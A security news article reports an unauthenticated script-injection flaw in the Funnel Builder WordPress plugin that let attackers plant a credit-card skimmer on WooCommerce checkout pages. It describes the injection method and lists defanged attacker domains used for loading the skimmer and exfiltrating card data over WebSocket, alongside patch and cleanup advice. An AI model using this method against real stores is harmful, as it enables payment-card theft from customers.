More than 40,000 websites run the Funnel Builder plugin for WordPress. As of May 16, 2026, every single one that hasn’t updated to version 3.15.0.3 is potentially handing over customer credit card numbers, CVVs, and billing addresses to attackers. That’s not hypothetical. It’s happening right now.
Key Takeaways
- The Funnel Builder plugin for WordPress had an unauthenticated vulnerability allowing arbitrary JavaScript injection into checkout pages.
- All versions before 3.15.0.3, released on May 15, 2026, are affected.
- The exploit lets attackers insert a credit card skimmer disguised as a fake Google Analytics script from analytics-reports[.]com.
- Sansec, an e-commerce security firm, detected live attacks injecting code that opens a WebSocket to wss://protect-wss[.]com/ws.
- Attackers steal full payment card data, including CVV and billing address — the exact combo used in high-value carding fraud.
How the Credit Card Skimmer Works
The flaw isn’t in some obscure third-party module. It’s baked into the core functionality of Funnel Builder, a tool designed to optimize conversions, not break them. And yet, that’s exactly what it’s doing — breaking trust, one checkout at a time.
Funnel Builder, developed by FunnelKit, lets site owners customize WooCommerce checkout flows. Things like one-click upsells, branded landing pages, and A/B testing are its bread and butter. But it also includes a feature called “External Scripts” — a field where admins can inject custom JavaScript for tracking, analytics, or integrations.
Here’s where it goes wrong: that field wasn’t secured. There was no authentication check. No capability validation. Just a public endpoint exposed to anyone who knew where to look. And attackers did.
An unauthenticated user could POST data directly to the checkout settings, modifying the External Scripts field remotely. That’s not just bad practice — it’s a fundamental failure in basic web security. You don’t let the internet rewrite your site’s JavaScript without asking.
Once injected, the malicious snippet loads jquery-lib.js from analytics-reports[.]com — a domain that doesn’t belong to Google, despite the naming. The script then establishes a WebSocket connection to wss://protect-wss[.]com/ws, a server under attacker control.
From there, the skimmer springs to life. When a customer enters their card number, CVV, and billing address, the malware captures it all. It doesn’t just log keystrokes or scrape form fields — it waits, watches, and exfiltrates the data in real time. The payload is dynamic, meaning the skimmer code delivered can be tailored per site, making detection harder.
Why This Skimmer Is Worse Than Most
Most Magecart-style attacks rely on supply chain compromises or stolen admin credentials. This one? It’s permissionless. You don’t need a password. You don’t need to phish anyone. You just send a POST request to a known endpoint and — boom — you’re injecting code into tens of thousands of live checkout pages.
And because the injected script masquerades as a Google Tag Manager snippet, it flies under the radar. Standard content security policies? They often allow Google Analytics. Site owners reviewing their scripts? They might see “jquery-lib.js” and think, “Yeah, that’s probably legit.”
But it’s not. It’s a credit card skimmer with a clean coat of digital paint.
- Target: WooCommerce checkout forms
- Injection method: Unauthenticated POST to exposed endpoint
- Delivery: Fake Google Analytics script (analytics-reports[.]com/wss/jquery-lib.js)
- Exfiltration: WebSocket to wss://protect-wss[.]com/ws
- Data stolen: Full card number, CVV, name, billing address
- Active since: Detected in the wild as of May 15, 2026
FunnelKit’s Patch Was a Day Late
Version 3.15.0.3 dropped on May 15, 2026 — the same day Sansec started sounding the alarm. That means for however long the exploit had been active before detection, sites were wide open. There’s no public CVE yet. No patch timeline. Just a quiet update and a terse advisory.
The vendor’s note, seen by Sansec, says simply: “we identified an issue that allowed bad actors to inject scripts.” That’s it. No apology. No timeline. No disclosure of how long the vulnerability existed. For a plugin running on 40,000+ sites handling real e-commerce transactions, that level of silence is concerning.
What we do know is that the fix adds authentication checks to the vulnerable endpoint. That’s not a complex refactor — it’s a missing current_user_can() call or nonce verification. Something that should’ve been there from day one.
And yet, it wasn’t. Which raises the question: how many other endpoints in this plugin are exposed? How many other settings can be manipulated without auth? This wasn’t a zero-day discovered in the wild — it was a gaping hole left in plain sight.
Why WordPress Plugin Security Keeps Failing
Let’s be clear: this isn’t the first time a popular WordPress plugin has shipped with critical flaws. It won’t be the last. But the pattern is maddeningly consistent. Developers build features fast, ship them to thousands, and treat security as an afterthought.
Funnel Builder has over 40,000 active installs. Its developer, FunnelKit, markets it as a conversion optimization tool — which means it’s likely used by growth-focused teams who care more about A/B test results than code audits.
And that’s the real problem. The WordPress plugin ecosystem runs on speed, not scrutiny. The barrier to entry is low. The update process is automated. And the assumption — dangerous as it is — is that if something’s on wordpress.org, it’s safe.
But wordpress.org doesn’t vet for security. It checks for malware at upload, sure, but it doesn’t audit code for logic flaws. A plugin can be 100% clean on day one and still have a catastrophic vulnerability baked into its design.
The Risk Isn’t Just Technical — It’s Operational
Even if you update to 3.15.0.3, you’re not out of the woods. The attacker might’ve already added a malicious script. And because the plugin allows arbitrary JavaScript, that script could still be sitting in your settings, quietly stealing data.
That’s why FunnelKit’s advisory tells admins to check Settings > Checkout > External Scripts. But how many will actually do it? How many site owners even know where that menu is?
Most WordPress sites are managed by agencies, freelancers, or overworked marketers. They update plugins when the dashboard says “1 update available.” They don’t audit every field. They don’t monitor network requests. And they definitely don’t have a SOC team watching for WebSocket connections to protect-wss[.]com.
Sansec Found It — But Who Else Did?
Sанsec, the e-commerce security company that detected the attack, has a strong track record in spotting Magecart campaigns. But here’s the unsettling part: if they saw it, others did too.
Malicious actors don’t need advanced tools to exploit this. The attack is simple, repeatable, and scalable. A single script could’ve scanned all 40,000+ Funnel Builder sites in hours. How many were compromised before May 15?
There’s no way to know. And that’s the real cost of vulnerabilities like this — not the patch, but the uncertainty. Every merchant using Funnel Builder now has to ask: were we hit? Were our customers’ cards stolen? Is that skimmer still running?
For attackers, this is a goldmine. Full card numbers with CVVs are worth 10x more than numbers alone on dark web markets. They enable online fraud without physical possession of the card. And with billing addresses included, even AVS checks can be bypassed.
“We identified an issue that allowed bad actors to inject scripts.” — FunnelKit security advisory, seen by Sansec
What This Means For You
If you run a WooCommerce store with Funnel Builder, update to 3.15.0.3 now. Don’t wait. Don’t schedule it for later. Do it today. Then go to Settings > Checkout > External Scripts and delete anything suspicious. If you didn’t add it, it doesn’t belong.
For developers, this is a wake-up call: never expose settings endpoints without authentication. Never assume your users will lock things down. And never ship code that lets attackers inject JavaScript into high-value pages. That’s not a feature — it’s a weapon.
The question isn’t whether this type of flaw will appear again. It’s how many more sites will be breached before the WordPress ecosystem treats plugin security like the critical infrastructure it is.
Sources: BleepingComputer, original report
